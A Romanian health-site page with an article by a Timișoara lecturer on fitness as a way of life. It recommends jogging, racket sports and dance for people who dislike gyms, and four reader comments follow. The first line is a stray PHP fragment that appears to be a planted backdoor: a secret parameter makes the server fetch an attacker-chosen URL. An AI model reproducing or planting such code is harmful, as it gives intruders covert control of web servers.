isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Fitness - MedicAS

Fitnessul - fitness bodyFitnessul este perceput în general la noi (şi poate doar pe plan local ) ca simplul fapt de a merge la o sală şi a face “fitness”, adică un complex de exerciţii pentru întreţinerea corporală şi dezvoltarea forţei. Însă termenul de fitness cuprinde o gamă mult mai variată de componente, plecînd de la condiţia fizică şi pînă la alimentaţie, regim de viaţă. Este o întreagă filozofie care se poate reduce la trei cuvinte : starea de bine.

Profesioniştii acestui gen se pot vedea la televizor, există competiţii pînă la nivel mondial de fitness. Însă importantă ar fi adoptarea acestui mod de viaţă de către oamenii de rând, care între activităţile profesionale şi alte obligaţii nu-şi găsesc timp în programul lor pentru ceea ce implică fitnessul. Poate că ideea de bază pleacă tocmai de la noţiunea de plăcere. Teoretic, toată lumea ştie că dăunează, colesterolul creşte dacă mîncăm nesănătos etc.

Aş dori să evidenţiez că această “stare de bine”, confort fizic, dar şi psihic se poate cîştiga prin . Fiecărui tip de individ (şi aici nu este vorba doar de tipul somatic, ci şi de personalitate) i se poate găsi cel puţin o disciplină sportivă care să-i convină şi să corespundă nevoilor şi placerilor sale. Nu este nevoie să mergi doar la “fitness” ca să devii fit (să ai un tonus muscular bun).

Pe plan local, există o multitudine de săli de sport şi terenuri amenajate pentru practicarea fotbalului şi împătimiţii fotbalului ştiu cum să-şi petreacă timpul liber, organizînd meciuri de fotbal şi păstrîndu-şi astfel condiţia fi zică. Dacă nu ar fi repriza a 3-a, în care se consumă şi alte produse care nu intră în filozofia fitnessului (vezi cîţiva mititei şi bere), atunci am putea spune că se respectă cerinţele de bază.

Problema se pune pentru doamne mai ales, care în afara aerobicului sau a sălii de “fitness”, nu prea găsesc multe mijloace adaptate cerinţelor fiecăreia. Însă întotdeauna există soluţii, dar acestea vin dintr-o educaţie pentru sport primită în copilărie- tinereţe. Este adevarat că descoperirea unor ramuri sau discipline sportive se face în general ghidat, prin intermediul unei persoane specializate sau cunoscătoare.

Iată cîteva soluţii pentru cele cărora fi e nu li se potrivesc nici aerobicul, nici fitnessul”, fie nu mai sunt motivate de ele. Puteţi juca squash, badminton sau tenis (baze sportive cu terenuri de tenis sau săli în care puteţi juca iarna există). Puteţi să vă înscrieţi la un club de arte marţiale, puteţi merge la dansuri sau să vă daţi cu rollele (cu conditia să nu-l transformaţi în sport extrem…). Unele grupuri joacă voley sau basket, dar dacă dumneavoastră sunteţi departe de tot ce înseamnă sport şi doriţi să-l descoperiţi, indiferent de vîrsta pe care o aveţi, atunci cel mai simplu lucru este alergatul. Celor ce iubesc natura şi care de felul lor sunt mai “individualiste”, le recomand joggingul, Pădurea Verde sau malul Begăi fiind locuri bune de alergat. Daca nu, sigur în cartierul unde locuiţi, se poate găsi un traseu de alergat nestînjenitor. Nu este obligatoriu să mergeţi pe stadion (la o activitate de lunga durată, alergatul în jurul pistei devine nemotivant). Pentru unii, ideea de a pleca de undeva şi a ajunge unde şi-au propus poate să-i stimuleze şi să-i motiveze mai mult decat cei 400m ai unei piste de alergare. Nu uitaţi să vă luaţi încalţări bune, comode, care sunt cele mai importante (în special talpa). Puteţi să să luaţi şi un amic, uneori în doi drumurile lungi sunt mai agreabile (cel putin 30 de minute de alergare pentru mărirea capacităţii aerobe); daca nu, un aparat MP3 şi muzica preferată vă pot face activitatea plăcută.

Cu timpul, după ce veţi descoperi plăcerile pe care le procură activităţile fizice, sigur vă veţi îmbunătaţi şi modurile de practicare. Nu trebuie să vă descurajaţi foarte uşor, drumul spre “starea de bine” se construieşte pas cu pas, pînă ce devine un mod de viaţă. Şi ce este mai important, devine unul în care noţiunea de plăcere e dominantă.

Lector dr. Simona Ionescu
Facultatea de Educaţie Fizică şi Sport, Timişoara


Cuvinte relevante: ,


Articole asemănătoare:

4 Răspunsuri la “Fitness - între modă şi necesitate”


 1. Laura :

  Interesant articolul…e adevarat ca nu prea ne gasim timp sa facem miscare, desi, atunci cand facem sport, ne simtim excelent.Cred ca ar trebui sa ne gindim mai mult la beneficii si sa nu consideram pierdut timpul petrecut la sala sau pe un teren de tenis, de exemplu.


 2. Seba :

  Faceti sport cind va simtiti BINE, dar mai ales faceti sport cind nu va simtiti bine. Si daca nu va place ceva in viata voastra, atunci trebuie sa SCHIMBATI ceva. Poate practicarea unui sport este schimbarea care va face diferenta.


 3. Alexander :

  Stiati ca una dintre cele 4 inteligente este inteligenta fizica? Si ca ea incepe cu miscare si efort fizic regulat? Corpul este “inteligent”. Nu-l lasati sa se “prosteasca”.


 4. AndreEa :

  da ai dreptate Seba, acum 2 ani aveam o viata de 12 ore pe scaun si 8 in pat. Dupa 1 an in care nu am facut deloc sport au inceput sa apara problemele de sanatate si parca nu mai aveam deloc rezistenta la efort.

  De aproape 2 ani ma duc la fitness de 3 ori pe saptamana si pot sa spun ca de fiecare data cand ies de acolo parca sunt alta persoana. In plus, de atunci nu mai gandesc negativ pentru ca am atata energie pozitiva in mine incat ar trebui sa ma chinui sa ma gandesc la ceva rau.Adaugă un comentariu


 
 

Newsletter

Loading... Loading...